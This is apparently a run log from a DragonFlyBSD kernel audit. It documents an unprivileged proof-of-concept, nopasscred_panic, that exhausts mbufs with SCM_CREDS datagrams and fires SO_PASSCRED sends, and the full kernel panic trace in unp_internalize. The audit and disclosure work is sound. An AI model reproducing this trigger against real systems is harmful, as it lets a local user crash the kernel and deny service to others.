DragonFlyBSD Kernel Audit
DF-0011 / run.log
DF-0011 — decisive run record (nopasscred_panic).
Run as unprivileged user maxx (uid 1001). Guest: DragonFly 6.5-DEVELOPMENT
(v6.5.0.1712.g89e6a-DEVELOPMENT, built Mon Jun 29 14:18:01 UTC 2026).

NOTE: this PoC panics the guest, so the program's own stderr (trigger.out on
the guest filesystem) is lost when the kernel drops to DDB and the snapshot
is reverted. The proof of the panic is the serial-console excerpt in
panic.txt (dfbsd-qemu/boot.log), reproduced here. The run was reproduced
twice from independent fresh `vm.sh reset` boots with an identical signature.

===== build (fresh guest, DF-0011/build.log) =====
$ cd poc/DF-0011 && cc -o nopasscred_panic nopasscred_panic.c -lpthread
BUILD_EXIT=0
-rwxr-xr-x  1 maxx  maxx  10384 Jul  2 00:38 nopasscred_panic

===== launch (unprivileged, detached) =====
$ (./nopasscred_panic > trigger.out 2>&1 &) ; echo launched
launched
(program ramps plain-mbuf pressure via SCM_CREDS-bearing SOCK_DGRAM datagrams
 held open across many socketpairs, while a trigger thread continuously fires
 no-control SO_PASSCRED sends; ~44s after launch the guest becomes
 unresponsive to ssh.)

===== serial console (dfbsd-qemu/boot.log) — the panic =====
login: Warning: objcache(mbuf) exhausted on cpu0!
Warning: objcache(mbuf) exhausted on cpu1!
Fatal user address access from kernel mode from nopasscred_panic at ffffffff806cdac1

Fatal trap 12: page fault while in kernel mode
cpuid = 1; lapic id = 1
fault virtual address	= 0x10
fault code		= supervisor read data, page not present
instruction pointer	= 0x8:0xffffffff806cdac1
stack pointer	        = 0x10:0xfffff800ab5d3568
frame pointer	        = 0x10:0xfffff800ab5d35a8
code segment		= base 0x0, limit 0xfffff, type 0x1b
			= DPL 0, pres 1, long 0, def32 0, gran 1
processor eflags	= interrupt enabled, resume, IOPL = 0
current process		= 1468
current thread          = pri 6
kernel: type 12 trap, code=0

CPU1 stopping CPUs: 0x00000001
 stopped
Stopped at      unp_internalize.isra.12+0x11:   movq    0x10(%rdi),%rbx
db>

===== result =====
status = reproduced (panic). Impact = denial of service. Guest reset
afterwards to recover.